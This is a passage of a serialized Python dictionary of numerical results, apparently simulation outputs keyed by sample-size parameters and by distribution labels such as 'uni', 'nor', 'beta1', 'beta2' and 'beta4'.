'beta2': 0.381992042961191, 'beta4': 0.3323036796222379}, 20: {'uni': 0.34867510464529977, 'nor': 0.35014087360264345, 'beta1': 0.34548306845712595, 'beta2': 0.3741498903455569, 'beta4': 0.33936857819735566}, 10: {'uni': 0.3389678071344472, 'nor': 0.3462171225002532, 'beta1': 0.3461858964125291, 'beta2': 0.35768688824311, 'beta4': 0.3454448002505371}}, 400: {1000: {'uni': 0.3412747607815299, 'nor': 1.0177178883630658, 'beta1': 0.3438242054634319, 'beta2': 1.9913254002158856, 'beta4': 0.20113561884912903}, 750: {'uni': 0.3490577726510959, 'nor': 0.8509827458513439, 'beta1': 0.34652921822246546, 'beta2': 1.5201078157253372, 'beta4': 0.211333303577262}, 500: {'uni': 0.34798773863259724, 'nor': 0.6755895166899817, 'beta1': 0.3473790211653727, 'beta2': 1.0987363289188878, 'beta4': 0.23196600902080236}, 400: {'uni': 0.3489527480495489, 'nor': 0.6044191427433583, 'beta1': 0.3467577402388518, 'beta2': 0.9335980474056014, 'beta4': 0.24488800695361335}, 300: {'uni': 0.3471155869537724, 'nor': 0.5508015092134401, 'beta1': 0.34424189925102483, 'beta2': 0.7935271208610247, 'beta4': 0.25747813877459824}, 200: {'uni': 0.3445568797042115, 'nor': 0.4675967309526432, 'beta1': 0.3500645313101199, 'beta2': 0.6739017550399186, 'beta4': 0.2743681532845661}, 150: {'uni': 0.35361449117436006, 'nor': 0.4511309221562023, 'beta1': 0.3462218569002684, 'beta2': 0.5791382939670757, 'beta4': 0.2887616378271954}, 100: {'uni': 0.34500319374883415, 'nor': 0.41178634546653503, 'beta1': 0.34728954575526966, 'beta2': 0.5011804138006778, 'beta4': 0.3034732161183125}, 75: {'uni': 0.34557108489320804, 'nor': 0.3989063728632237, 'beta1': 0.3470788068835562, 'beta2': 0.4569511082377164, 'beta4': 0.3171266416110887}, 50: {'uni': 0.3469017207004219, 'nor': 0.38520506727358106, 'beta1': 0.34612160245120194, 'beta2': 0.41185340415894384, 'beta4': 0.32620775126216733}, 30: {'uni': 0.34632131112233244, 'nor': 0.36585499457591303, 'beta1': 0.3444607742924859, 'beta2': 0.3889474502225472, 'beta4': 0.3336066143492354}, 20: {'uni': 0.3502013005709345, 'nor': 0.36446150318855836, 'beta1': 0.3479197101489542, 'beta2': 0.3737133387595116, 'beta4': 0.3364565889405686}, 10: {'uni': 0.34007066527671714, 'nor': 0.349271960957368, 'beta1': 0.33995922081352276, 'beta2': 0.36095135551696184, 'beta4': 0.3422350611007681}}, 300: {1000: {'uni': 0.34780248511164635, 'nor': 1.2459233986726455, 'beta1': 0.34744144501755014, 'beta2': 2.2084838579165464, 'beta4': 0.189081472987699}, 750: {'uni': 0.34654011205832125, 'nor': 1.006322838980424, 'beta1': 0.34742183633042256, 'beta2': 1.7091687862980112, 'beta4': 0.1986938433930994}, 500: {'uni': 0.3456791171060871, 'nor': 0.7751979278397534, 'beta1': 0.3440113776197222, 'beta2': 1.2092320961421312, 'beta4': 0.217132298417705}, 400: {'uni': 0.3489269333627507, 'nor': 0.7044423515166887, 'beta1': 0.34411795808308093, 'beta2': 1.0310653608432898, 'beta4': 0.23030128761412128}, 300: {'uni': 0.34837799124822233, 'nor': 0.606506473158486, 'beta1': 0.3492891192903364, 'beta2': 0.9333450580111946, 'beta4': 0.2408361375200047}, 200: {'uni': 0.34730139025972234, 'nor': 0.5272296871475277, 'beta1': 0.33971683925089174, 'beta2': 0.7361677221850133, 'beta4': 0.2637544743748866}, 150: {'uni': 0.34760670816432354, 'nor': 0.481145213232932, 'beta1': 0.3467693322076453, 'beta2': 0.6173032899166593, 'beta4': 0.2750328241811572}, 100: {'uni': 0.3480710820539448, 'nor': 0.4373869135130795, 'beta1': 0.34733880445619963, 'beta2': 0.5217846583202729, 'beta4': 0.29138608643267194}, 75: {'uni': 0.344012344807911, 'nor': 0.4023970962232527, 'beta1': 0.3495418301470877, 'beta2': 0.48385297839039, 'beta4': 0.30746632172742533}, 50: {'uni': 0.3456741024510142, 'nor': 0.387583403531333, 'beta1': 0.3450764110863124, 'beta2': 0.42792581205635305, 'beta4': 0.31493852332853506}, 30: {'uni': 0.34757461968534475, 'nor': 0.3660480324362303, 'beta1': 0.3430535156174783, 'beta2': 0.39516737178821565, 'beta4': 0.3266792953043453}, 20: {'uni': 0.34332496479157215, 'nor': 0.37016864522498233, 'beta1': 0.3438921835770231, 'beta2': 0.3780257022382943, 'beta4': 0.332826430774212}, 10: {'uni': 0.3432638175430853, 'nor': 0.34656732461796685, 'beta1': 0.34530041961548025, 'beta2': 0.3621336740217708, 'beta4': 0.33301573335144213}}, 200: {1000: {'uni': 0.35397577006236064, 'nor': 1.6880107688499668, 'beta1': 0.3509512766017229, 'beta2': 2.5472310916904464, 'beta4': 0.17937070455079063}, 750: {'uni': 0.3534492950521917, 'nor': 1.3462174364691601, 'beta1': 0.34252933428118637, 'beta2': 1.9997138016373859, 'beta4': 0.18808720501818546}, 500: {'uni': 0.3414087298618831, 'nor': 1.003233841927636, 'beta1': 0.3453809732427485, 'beta2': 1.4542100041390176, 'beta4': 0.2028182073608281}, 400: {'uni': 0.3458951879188956, 'nor': 0.8685866682805892, 'beta1': 0.34743230253372726, 'beta2': 1.332099610483853, 'beta4': 0.20908071122056882}, 300: {'uni': 0.3471664547886561, 'nor': 0.727794381484671, 'beta1': 0.35076929096112525, 'beta2': 1.0434269108804657, 'beta4': 0.22423365788256022}, 200: {'uni': 0.34413238821258607, 'nor': 0.6147359660914746, 'beta1': 0.35089981074426324, 'beta2': 0.8099260333831554, 'beta4': 0.24358797686705402}, 150: {'uni': 0.339936102320085, 'nor': 0.55221617457234, 'beta1': 0.34616688013398644, 'beta2': 0.7051079677507086, 'beta4': 0.2505100139108426}, 100: {'uni': 0.3446261265431087, 'nor': 0.4792836523502122, 'beta1': 0.35142451365868926, 'beta2': 0.5858619038731584, 'beta4': 0.2751043217476785}, 75: {'uni': 0.3478642666164821, 'nor': 0.45888115676348, 'beta1': 0.3486583947927791, 'beta2': 0.5164284462675127, 'beta4': 0.28845638479831875}, 50: {'uni': 0.34103513391692986, 'nor': 0.41208649872391234, 'beta1': 0.344884394694451, 'beta2': 0.45971215774307156, 'beta4': 0.29938022874279796}, 30: {'uni': 0.3481030712621901, 'nor': 0.3894583006944668, 'beta1': 0.34717964633738396, 'beta2': 0.4096578744766348, 'beta4': 0.3197560171684093}, 20: {'uni': 0.33983037641029334, 'nor': 0.37505954789145096, 'beta1': 0.3487484160639571, 'beta2': 0.38550515120020684, 'beta4': 0.32511678116663717}, 10: {'uni': 0.34648485570776455, 'nor': 0.36054087791292677, 'beta1': 0.3457880198406115, 'beta2': 0.36093745693627277, 'beta4': 0.33750493584405156}}, 150: {1000: {'uni': 0.35855679355645487, 'nor': 2.137814211516231, 'beta1': 0.3505282691209241, 'beta2': 2.9019884065488495, 'beta4': 0.17157691794475752}, 750: {'uni': 0.3520800612264919, 'nor': 1.7021693510463247, 'beta1': 0.3511398978439243, 'beta2': 2.269796020841365, 'beta4': 0.17947834909802796}, 500: {'uni': 0.35011570165384504, 'nor': 1.2462148272826032, 'beta1': 0.34610681903199625, 'beta2': 1.7552755586485762, 'beta4': 0.19119731999075687}, 400: {'uni': 0.3456329512316953, 'nor': 1.0590359965214562, 'beta1': 0.35014065898105695, 'beta2': 1.4313410427332007, 'beta4': 0.19623036838033153}, 300: {'uni': 0.34527118758550485, 'nor': 0.8812749025718438, 'beta1': 0.34944394458697825, 'beta2': 1.1588075057993832, 'beta4': 0.20771969576432014}, 200: {'uni': 0.3489738989982756, 'nor': 0.7014599135166738, 'beta1': 0.34830333644666117, 'beta2': 0.915340546836583, 'beta4': 0.2263531728160868}, 150: {'uni': 0.3429228048276349, 'nor': 0.6165824034990142, 'beta1': 0.34343683973228967, 'beta2': 0.7566890470098447, 'beta4': 0.24382109386295112}, 100: {'uni': 0.3425285186465402, 'nor': 0.5317499572943216, 'beta1': 0.3454943851918104, 'beta2': 0.6240602607130921, 'beta4': 0.26276196224188025}, 75: {'uni': 0.3473550254909798, 'nor': 0.4781796971737509, 'beta1': 0.3493724223269961, 'beta2': 0.5591888563697984, 'beta4': 0.27778273801276504}, 50: {'uni': 0.3428279297727261, 'nor': 0.43535250166487094, 'beta1': 0.3442214225564261, 'beta2': 0.479908838662072, 'beta4': 0.2937106328128505}, 30: {'uni': 0.3418794080578704, 'nor': 0.40103316462979616, 'beta1': 0.3499534241478493, 'beta2': 0.4227810467699822, 'beta4': 0.3102985640146892}, 20: {'uni': 0.34811502141065576, 'nor': 0.38549582915429814, 'beta1': 0.3441463547925956, 'beta2': 0.39277202188140015, 'beta4': 0.3187336459718889}, 10: {'uni': 0.34330862403529744, 'nor': 0.36346435616006495, 'beta1': 0.3469201841472034, 'beta2': 0.3581487076523773, 'beta4': 0.3327277447628047}}, 100: {1000: {'uni': 0.3722831918742666, 'nor': 3.0381615766629624, 'beta1': 0.3487812436005163, 'beta2': 3.4056411541631597, 'beta4': 0.16687909663377307}, 750: {'uni': 0.36086762860351934, 'nor': 2.3794615987237338, 'beta1': 0.351189585306215, 'beta2': 2.5949293863952536, 'beta4': 0.1709871528017898}, 500: {'uni': 0.349805023733788, 'nor': 1.7056246948939178, 'beta1': 0.3475762510915695, 'beta2': 1.9018134806788765, 'beta4': 0.17969632659255938}, 400: {'uni': 0.3490677824745589, 'nor': 1.3999121462123332, 'beta1': 0.3507443961701372, 'beta2': 1.6095123649369334, 'beta4': 0.18579332318138084}, 300: {'uni': 0.34879085377563823, 'nor': 1.1658197529948917, 'beta1': 0.34774454661138066, 'beta2': 1.3183855664195328, 'beta4': 0.19580380328549032}, 200: {'uni': 0.34331340368316626, 'nor': 0.8793367098901197, 'beta1': 0.3449855343207457, 'beta2': 1.0296524804053566, 'beta4': 0.21178290032007802}, 150: {'uni': 0.34134065052350926, 'nor': 0.7550776311919849, 'beta1': 0.3438476193999038, 'beta2': 0.8356367089354535, 'beta4': 0.2243814426924324}, 100: {'uni': 0.34494961517463724, 'nor': 0.6074739448155042, 'beta1': 0.350538922675542, 'beta2': 0.6833257829663539, 'beta4': 0.2435075875469618}, 75: {'uni': 0.34823909271266096, 'nor': 0.5506586574743351, 'beta1': 0.3450886289873298, 'beta2': 0.5985491404272344, 'beta4': 0.2562367198191135}, 50: {'uni': 0.3445907688697594, 'nor': 0.4892029171428822, 'beta1': 0.351685420248068, 'beta2': 0.50463513631763, 'beta4': 0.2721121885598124}, 30: {'uni': 0.34380387455691164, 'nor': 0.42482766423752505, 'beta1': 0.3517093374868383, 'beta2': 0.433137251893754, 'beta4': 0.29889400163605306}, 20: {'uni': 0.34761787684419804, 'nor': 0.40063690078106884, 'beta1': 0.34569487097161505, 'beta2': 0.4043324689835272, 'beta4': 0.3099384406707861}, 10: {'uni': 0.3368231032278602, 'nor': 0.37414139322084167, 'beta1': 0.34526172651145914, 'beta2': 0.3768152424104807, 'beta4': 0.3258793776432392}}, 75: {1000: {'uni': 0.38032079371458866, 'nor': 3.893179411720956, 'beta1': 0.33895197976916025, 'beta2': 3.665817783885145, 'beta4': 0.16221681570587448}, 750: {'uni': 0.3774896680042954, 'nor': 3.041307612796793, 'beta1': 0.3531047623969306, 'beta2': 2.9177298137115932, 'beta4': 0.16760701259293861}, 500: {'uni': 0.3691603809627662, 'nor': 2.1136522720926076, 'beta1': 0.3506731318868911, 'beta2': 2.0800219389279033, 'beta4': 0.17237248115050258}, 400: {'uni': 0.3542804938614184, 'nor': 1.7635783367478515, 'beta1': 0.3480209110363151, 'beta2': 1.753279431906443, 'beta4': 0.17877015455578205}, 300: {'uni': 0.3530910129911514, 'nor': 1.40824257505653, 'beta1': 0.3468992232652649, 'beta2': 1.4286138146048428, 'beta4': 0.18618258284509892}, 200: {'uni': 0.35404448422917234, 'nor': 1.0871523518236694, 'beta1': 0.34676310798083787, 'beta2': 1.0969581653639313, 'beta4': 0.19917988881180035}, 150: {'uni': 0.3471357147047061, 'nor': 0.8860821820154345, 'beta1': 0.34219905448064564, 'beta2': 0.9223710573153442, 'beta4': 0.21007320251501296}, 100: {'uni': 0.3473811058881694, 'nor': 0.715183149921106, 'beta1': 0.34386435910210156, 'beta2': 0.7290266843292309, 'beta4': 0.2302230863314267}, 75: {'uni': 0.34480847684480825, 'nor': 0.6128517103087979, 'beta1': 0.3490544903490166, 'beta2': 0.6210256341169503, 'beta4': 0.23928023154694925}, 50: {'uni': 0.3519634286283122, 'nor': 0.535269531408463, 'beta1': 0.3485012701192417, 'beta2': 0.529307351668824, 'beta4': 0.26177269899069644}, 30: {'uni': 0.34761067896637265, 'nor': 0.460593353930858, 'beta1': 0.3460459195016941, 'beta2': 0.4519827169452344, 'beta4': 0.289949655149545}, 20: {'uni': 0.3468412967012832, 'nor': 0.42130771837669, 'beta1': 0.34702385398283925, 'beta2': 0.42403711754723916, 'beta4': 0.3001880754924463}, 10: {'uni': 0.3395056585563256, 'nor': 0.38398628388024797, 'beta1': 0.34266048288383505, 'beta2': 0.37609257537094914, 'beta4': 0.32389503113475765}}, 50: {1000: {'uni': 0.4347386296621316, 'nor': 5.903113283717573, 'beta1': 0.3458499082519396, 'beta2': 4.56059131081475, 'beta4': 0.16177924865526983}, 750: {'uni': 0.4080484429773817, 'nor': 4.462441182886646, 'beta1': 0.3448072378752806, 'beta2': 3.627354125296263, 'beta4': 0.16521179391821397}, 500: {'uni': 0.3852363552796836, 'nor': 3.0766708652850117, 'beta1': 0.3474481187838615, 'beta2': 2.544804667262524, 'beta4': 0.16604306303156843}, 400: {'uni': 0.38227668686292127, 'nor': 2.548974709246717, 'beta1': 0.3564344226224531, 'beta2': 2.1034143877988716, 'beta4': 0.16997498457387009}, 300: {'uni': 0.36482493041269376, 'nor': 1.9887184654132837, 'beta1': 0.34800510793556466, 'beta2': 1.6526246501307664, 'beta4': 0.17253160277881177}, 200: {'uni': 0.36337018580466046, 'nor': 1.4457332170143293, 'beta1': 0.3510141513992577, 'beta2': 1.2763395931108832, 'beta4': 0.18462120515319508}, 150: {'uni': 0.35577904314930736, 'nor': 1.1558700394945114, 'beta1': 0.34949146441961493, 'beta2': 1.0592480702192182, 'beta4': 0.19561796749180563}, 100: {'uni': 0.3477172098075887, 'nor': 0.9073729769528663, 'beta1': 0.3450185824743941, 'beta2': 0.8094515457094794, 'beta4': 0.2071546414569944}, 75: {'uni': 0.34125034122921394, 'nor': 0.7547201637839731, 'beta1': 0.3456874754796907, 'beta2': 0.7017239279026216, 'beta4': 0.21922659978150177}, 50: {'uni': 0.33880945045029826, 'nor': 0.6079205186753285, 'beta1': 0.3543737005717827, 'beta2': 0.5816117115186251, 'beta4': 0.24353668852069424}, 30: {'uni': 0.3431007994484497, 'nor': 0.515581573279696, 'beta1': 0.346492905581158, 'beta2': 0.4727465341515703, 'beta4': 0.2707420287422262}, 20: {'uni': 0.33540476537955854, 'nor': 0.45520516780061937, 'beta1': 0.3406042857634804, 'beta2': 0.42569063054856937, 'beta4': 0.2864332225489485}, 10: {'uni': 0.34219260815428754, 'nor': 0.4030004368028241, 'beta1': 0.3424555787270816, 'beta2': 0.3895108454898639, 'beta4': 0.3134271440491817}}, 30: {1000: {'uni': 0.5912672207776604, 'nor': 9.527258371560922, 'beta1': 0.36358902818996824, 'beta2': 6.0474393748944255, 'beta4': 0.1566183550644414}, 750: {'uni': 0.5205276415999436, 'nor': 7.1846290287913535, 'beta1': 0.36042655724639866, 'beta2': 4.721207847858767, 'beta4': 0.15817695286915404}, 500: {'uni': 0.458945074914611, 'nor': 4.9438685876332675, 'beta1': 0.3512022799112701, 'beta2': 3.277870745954269, 'beta4': 0.16010949046042697}, 400: {'uni': 0.4392171770850031, 'nor': 4.040052462527793, 'beta1': 0.34937995162981234, 'beta2': 2.685259178691964, 'beta4': 0.16469616287949998}, 300: {'uni': 0.4042998393631235, 'nor': 3.1228108633451424, 'beta1': 0.35391590930846445, 'beta2': 2.0726334265315987, 'beta4': 0.16673640336372708}, 200: {'uni': 0.387238644411021, 'nor': 2.1704115878479118, 'beta1': 0.34614994776463975, 'beta2': 1.5341779941768152, 'beta4': 0.17262425762789227}, 150: {'uni': 0.3718021016553037, 'nor': 1.6935285337198958, 'beta1': 0.345108376430461, 'beta2': 1.2073441904012723, 'beta4': 0.1762258439064716}, 100: {'uni': 0.3584866807874342, 'nor': 1.2538009391466625, 'beta1': 0.3450931333761505, 'beta2': 0.9488607884476075, 'beta4': 0.18927407539036956}, 75: {'uni': 0.35116467381518124, 'nor': 1.0239932402161527, 'beta1': 0.3464071359362087, 'beta2': 0.8024377076076704, 'beta4': 0.20216287361165863}, 50: {'uni': 0.34245713359424695, 'nor': 0.811421429036936, 'beta1': 0.3488815710989564, 'beta2': 0.638751193692387, 'beta4': 0.2176599981779147}, 30: {'uni': 0.34903831332483576, 'nor': 0.6147648924540778, 'beta1': 0.3440196877298809, 'beta2': 0.515506440973083, 'beta4': 0.24016190092594067}, 20: {'uni': 0.33737476805183686, 'nor': 0.5309803958803571, 'beta1': 0.34097608432305376, 'beta2': 0.4582370367023497, 'beta4': 0.26284911332188543}, 10: {'uni': 0.33781041301044673, 'nor': 0.4419972892631432, 'beta1': 0.34437991388723727, 'beta2': 0.3942969069743231, 'beta4': 0.2865988298916934}}, 20: {1000: {'uni': 0.8965909515980386, 'nor': 14.43160261621047, 'beta1': 0.40879724910349813, 'beta2': 7.703097044523489, 'beta4': 0.15777136298750422}, 750: {'uni': 0.7465181212742386, 'nor': 10.80135778166109, 'beta1': 0.38921094677035356, 'beta2': 5.9974942469122325, 'beta4': 0.15998239385661403}, 500: {'uni': 0.6088672984749545, 'nor': 7.304689028033914, 'beta1': 0.373771541626272, 'beta2': 4.027137560010544, 'beta4': 0.16163415741805556}, 400: {'uni': 0.5512936057820512, 'nor': 5.956240612141846, 'beta1': 0.3697285679426312, 'beta2': 3.335922157039538, 'beta4': 0.1611260117755855}, 300: {'uni': 0.49676954291719955, 'nor': 4.58931566065136, 'beta1': 0.35950999134779804, 'beta2': 2.583167677932982, 'beta4': 0.1622195846063796}, 200: {'uni': 0.43568253433790133, 'nor': 3.1173720871603443, 'beta1': 0.3464265148706499, 'beta2': 1.8079860961396275, 'beta4': 0.16758797337107686}, 150: {'uni': 0.4046165586714504, 'nor': 2.4195703053430293, 'beta1': 0.3531443387784461, 'beta2': 1.4753331116985116, 'beta4': 0.16965491542778036}, 100: {'uni': 0.3762742643740686, 'nor': 1.765288822689759, 'beta1': 0.3524276940513375, 'beta2': 1.0841173374160238, 'beta4': 0.17845587683466202}, 75: {'uni': 0.36218638835697453, 'nor': 1.3876888573033577, 'beta1': 0.3503939829222516, 'beta2': 0.8954861247858222, 'beta4': 0.1877690214122453}, 50: {'uni': 0.3521418775849935, 'nor': 1.0414912127014189, 'beta1': 0.34022528133363233, 'beta2': 0.7054403223889628, 'beta4': 0.20028939322658593}, 30: {'uni': 0.3426909931385447, 'nor': 0.7675040513769444, 'beta1': 0.34053541174088253, 'beta2': 0.5503420280923643, 'beta4': 0.2215057999895056}, 20: {'uni': 0.3363305461705004, 'nor': 0.6255214087625113, 'beta1': 0.33491632393555937, 'beta2': 0.46832505580377143, 'beta4': 0.24284505128556536}, 10: {'uni': 0.33518761864677465, 'nor': 0.4931184293561005, 'beta1': 0.3391485976534156, 'beta2': 0.39630521127982427, 'beta4': 0.27139530895291425}}, 10: {1000: {'uni': 2.3874340797968814, 'nor': 29.663480850360397, 'beta1': 0.9169229003489705, 'beta2': 12.20925559858758, 'beta4': 0.1564888636547848}, 750: {'uni': 1.8615157681014205, 'nor': 21.801968499676818, 'beta1': 0.7473940671291324, 'beta2': 9.267094002909307, 'beta4': 0.1561349717825088}, 500: {'uni': 1.3134854154935922, 'nor': 15.249137564401448, 'beta1': 0.5934628187469416, 'beta2': 6.175670299414178, 'beta4': 0.1576162013654804}, 400: {'uni': 1.1145075409375296, 'nor': 11.974411479422269, 'beta1': 0.5301830934992371, 'beta2': 5.140934047559648, 'beta4': 0.15897679114618293}, 300: {'uni': 0.9078215986658665, 'nor': 8.868858736093818, 'beta1': 0.4850422676075548, 'beta2': 3.8520697501497536, 'beta4': 0.15601309502687813}, 200: {'uni': 0.7081080566694192, 'nor': 6.227802150964231, 'beta1': 0.4280233051488676, 'beta2': 2.6977738374144065, 'beta4': 0.16111656347952902}, 150: {'uni': 0.6007454684465097, 'nor': 4.710059470113114, 'beta1': 0.3990084689677828, 'beta2': 2.0564056256518675, 'beta4': 0.1627500664646643}, 100: {'uni': 0.49761742864535224, 'nor': 3.250988568599194, 'beta1': 0.3737337332326855, 'beta2': 1.4561033940469712, 'beta4': 0.1665861437159576}, 75: {'uni': 0.4503391470649682, 'nor': 2.5306944092179675, 'beta1': 0.36124674699535686, 'beta2': 1.1922233929028405, 'beta4': 0.16676211842199312}, 50: {'uni': 0.40116564754189815, 'nor': 1.8282171177299855, 'beta1': 0.35304130396901157, 'beta2': 0.8794730305256969, 'beta4': 0.17737449940003902}, 30: {'uni': 0.35980970739758494, 'nor': 1.222640887186312, 'beta1': 0.3400081965549426, 'beta2': 0.6511660921260646, 'beta4': 0.18895070743803286}, 20: {'uni': 0.34682134148512966, 'nor': 0.9477562627590225, 'beta1': 0.33450338225464055, 'beta2': 0.538055747077308, 'beta4': 0.2062208052648477}, 10: {'uni': 0.3311807215098405, 'nor': 0.6394074548870496, 'beta1': 0.3301935234529011, 'beta2': 0.41808098738012345, 'beta4': 0.239050783112545}}}, 0.2: {1000: {1000: {'uni': 0.24124725799461827, 'nor': 0.4053264452318229, 'beta1': 0.23914293982059717, 'beta2': 1.0509959984580306, 'beta4': 0.17568080256625232}, 750: {'uni': 0.24164388268120782, 'nor': 0.3687830499658719, 'beta1': 0.243028138607501, 'beta2': 0.784731460864333, 'beta4': 0.18815121077723373}, 500: {'uni': 0.24326842966163004, 'nor': 0.32463820180526554, 'beta1': 0.24310356844769024, 'beta2': 0.560609377317712, 'beta4': 0.19960017726532056}, 400: {'uni': 0.23902795484816924, 'nor': 0.3125538120607967, 'beta1': 0.24223057995297714, 'beta2': 0.4770053150772008, 'beta4': 0.20309690339198788}, 300: {'uni': 0.23869851303079107, 'nor': 0.2917904746847079, 'beta1': 0.23805489672369276, 'beta2': 0.4061962989224635, 'beta4': 0.21148616699287323}, 200: {'uni': 0.24368185962341393, 'nor': 0.279239353863688, 'beta1': 0.24329991362449854, 'beta2': 0.3464015419031672, 'beta4': 0.21701422300653347}, 150: {'uni': 0.23805417073622206, 'nor': 0.2648108143069742, 'beta1': 0.24112587613874334, 'beta2': 0.3169793434410238, 'beta4': 0.22625899182567927}, 100: {'uni': 0.24112468954747324, 'nor': 0.2555534679342511, 'beta1': 0.24391216254475265, 'beta2': 0.2811465587345888, 'beta4': 0.22615912967234958}, 75: {'uni': 0.2377789796740822, 'nor': 0.2502177301730839, 'beta1': 0.23897299843042535, 'beta2': 0.27291284924753667, 'beta4': 0.23102167971177617}, 50: {'uni': 0.2420481229386659, 'nor': 0.2483541709202484, 'beta1': 0.2395019750658544, 'beta2': 0.26178626368274266, 'beta4': 0.2378697343455223}, 30: {'uni': 0.23839523280714542, 'nor': 0.2448261144336522, 'beta1': 0.24297869273136183, 'beta2': 0.2549842966602735, 'beta4': 0.2344566138825933}, 20: {'uni': 0.24294085836130722, 'nor': 0.2459984385174377, 'beta1': 0.2409977912230283, 'beta2': 0.24836430873811524, 'beta4': 0.24236541724974348}, 10: {'uni': 0.23996750948003354, 'nor': 0.24319752879898954, 'beta1': 0.24061748766076452, 'beta2': 0.24848114887420777, 'beta4': 0.23742872285699368}}, 750: {1000: {'uni': 0.24213602459464384, 'nor': 0.4668947186186115, 'beta1': 0.2400298002859102, 'beta2': 1.0537929179775296, 'beta4': 0.16960490699279673}, 750: {'uni': 0.24252558303608956, 'nor': 0.40252237715680944, 'beta1': 0.24007629950163753, 'beta2': 0.7880701340760959, 'beta4': 0.17806957712390817}, 500: {'uni': 0.24364703012383299, 'nor': 0.34998153650454966, 'beta1': 0.24139971779624214, 'beta2': 0.5617828287616604, 'beta4': 0.1912425902387635}, 400: {'uni': 0.24147766494729744, 'nor': 0.33073040328340325, 'beta1': 0.23886051231633573, 'beta2': 0.4821271764245669, 'beta4': 0.19650526443681385}, 300: {'uni': 0.24537594610132082, 'nor': 0.30608768980075746, 'beta1': 0.23858930631150674, 'beta2': 0.41147281542567865, 'beta4': 0.20502061090216653}, 200: {'uni': 0.24268617663557088, 'nor': 0.2891942420581909, 'beta1': 0.24104096550685916, 'beta2': 0.3549441465252581, 'beta4': 0.21514022394369312}, 150: {'uni': 0.24034254831699772, 'nor': 0.2725893818027367, 'beta1': 0.23968652814412453, 'beta2': 0.32196628110834, 'beta4': 0.22158539656940412}, 100: {'uni': 0.24066960454670216, 'nor': 0.26072438431981576, 'beta1': 0.23860999283751405, 'beta2': 0.295308268894434, 'beta4': 0.22468320403577302}, 75: {'uni': 0.2372348854433789, 'nor': 0.2577253003131136, 'beta1': 0.23904507681739837, 'beta2': 0.2808413650663696, 'beta4': 0.22998494050062063}, 50: {'uni': 0.24162659968427913, 'nor': 0.25234746676918207, 'beta1': 0.24423303357816123, 'beta2': 0.26517888856634686, 'beta4': 0.23259076555479863}, 30: {'uni': 0.24026106701043032, 'nor': 0.24910214073724177, 'beta1': 0.2405253750459323, 'beta2': 0.2551649499009466, 'beta4': 0.2365634356538571}, 20: {'uni': 0.24267815059641026, 'nor': 0.245298372253819, 'beta1': 0.24080870936687, 'beta2': 0.2552267059461294, 'beta4': 0.24100356768933173}, 10: {'uni': 0.24456210577096196, 'nor': 0.24477627325344592, 'beta1': 0.24555026833090088, 'beta2': 0.242950667829395, 'beta4': 0.24155735139737788}}, 500: {1000: {'uni': 0.24164987087115197, 'nor': 0.5721918782884466, 'beta1': 0.23996298637023378, 'beta2': 1.1779948690165256, 'beta4': 0.15428354475510184}, 750: {'uni': 0.24159673038840507, 'nor': 0.4918971663930825, 'beta1': 0.24120994313020436, 'beta2': 0.8803516369213815, 'beta4': 0.16565776898213674}, 500: {'uni': 0.23991550021580707, 'nor': 0.4101489076635629, 'beta1': 0.23929053512796192, 'beta2': 0.6491947662249905, 'beta4': 0.17883673195668998}, 400: {'uni': 0.24251723206941572, 'nor': 0.36960634216527005, 'beta1': 0.24277119423256865, 'beta2': 0.5505149369922498, 'beta4': 0.18419162201388328}, 300: {'uni': 0.24179003293271845, 'nor': 0.33510396603618053, 'beta1': 0.24003491428852153, 'beta2': 0.4621704086743315, 'beta4': 0.19345184620978545}, 200: {'uni': 0.24008858690578336, 'nor': 0.30561704025672465, 'beta1': 0.2411289063793809, 'beta2': 0.38799140893024225, 'beta4': 0.20430036700083373}, 150: {'uni': 0.2402127113334836, 'nor': 0.29359145762455585, 'beta1': 0.24097953145287435, 'beta2': 0.35422332515291893, 'beta4': 0.21168379467345955}, 100: {'uni': 0.24266553946279426, 'nor': 0.2764289867601266, 'beta1': 0.23940472376646318, 'beta2': 0.3109340118793721, 'beta4': 0.22327921524434563}, 75: {'uni': 0.24228255563926224, 'nor': 0.2684971154591404, 'beta1': 0.24478704183107347, 'beta2': 0.2904293862430301, 'beta4': 0.2222914607306522}, 50: {'uni': 0.24336271099583262, 'nor': 0.2573476188536372, 'beta1': 0.23890548191925962, 'beta2': 0.2784552417268729, 'beta4': 0.22861542581896685}, 30: {'uni': 0.24204605571751606, 'nor': 0.25108561658127865, 'beta1': 0.24555355114900856, 'beta2': 0.2627389376158154, 'beta4': 0.23170001504553606}, 20: {'uni': 0.24073537437234863, 'nor': 0.2470271721892606, 'beta1': 0.2464463166884145, 'beta2': 0.25549256236330153, 'beta4': 0.24037869393451103}, 10: {'uni': 0.24247329417887659, 'nor': 0.2441965770243582, 'beta1': 0.24103184940811473, 'beta2': 0.2520935857785229, 'beta4': 0.23862365558069581}}, 400: {1000: {'uni': 0.24211427327472068, 'nor': 0.676319267340814, 'beta1': 0.24108390834726123, 'beta2': 1.1690252804190693, 'beta4': 0.15078182161253156}, 750: {'uni': 0.24267791300187727, 'nor': 0.5501413249911372, 'beta1': 0.242775031630821, 'beta2': 0.897697338268199, 'beta4': 0.15869834269819497}, 500: {'uni': 0.24145820022964667, 'nor': 0.4521520593828404, 'beta1': 0.2418804659547599, 'beta2': 0.6550622764615105, 'beta4': 0.16977219676395533}, 400: {'uni': 0.23821559225819358, 'nor': 0.4102458629344209, 'beta1': 0.23743320963502837, 'beta2': 0.5687082029198804, 'beta4': 0.17623787502407762}, 300: {'uni': 0.23986191363478224, 'nor': 0.36396123975400607, 'beta1': 0.24081073282914195, 'beta2': 0.4752804571225306, 'beta4': 0.18821500754467457}, 200: {'uni': 0.24029454257379748, 'nor': 0.3223034871436207, 'beta1': 0.2399555016919217, 'beta2': 0.41519656419281536, 'beta4': 0.19773039648651466}, 150: {'uni': 0.24112635756275794, 'nor': 0.3034935016307265, 'beta1': 0.2435734602722558, 'beta2': 0.36533428802282, 'beta4': 0.20514348419020711}, 100: {'uni': 0.23780523639691478, 'nor': 0.2831084401784451, 'beta1': 0.23747175043173488, 'beta2': 0.31735429345053373, 'beta4': 0.21660212309631313}, 75: {'uni': 0.2418157552287163, 'nor': 0.26979755399473915, 'beta1': 0.24058627879036779, 'beta2': 0.3005365712461821, 'beta4': 0.21980198569077422}, 50: {'uni': 0.24415674401788423, 'nor': 0.25836745432753955, 'beta1': 0.23928001830324636, 'beta2': 0.27485770957941486, 'beta4': 0.22835111909074343}, 30: {'uni': 0.24609118802801827, 'nor': 0.2534347434770235, 'beta1': 0.23925830272224197, 'beta2': 0.2638635206820125, 'beta4': 0.22976503900007766}, 20: {'uni': 0.23922321624939863, 'nor': 0.24850008485696506, 'beta1': 0.24063011653162658, 'beta2': 0.2552606058417734, 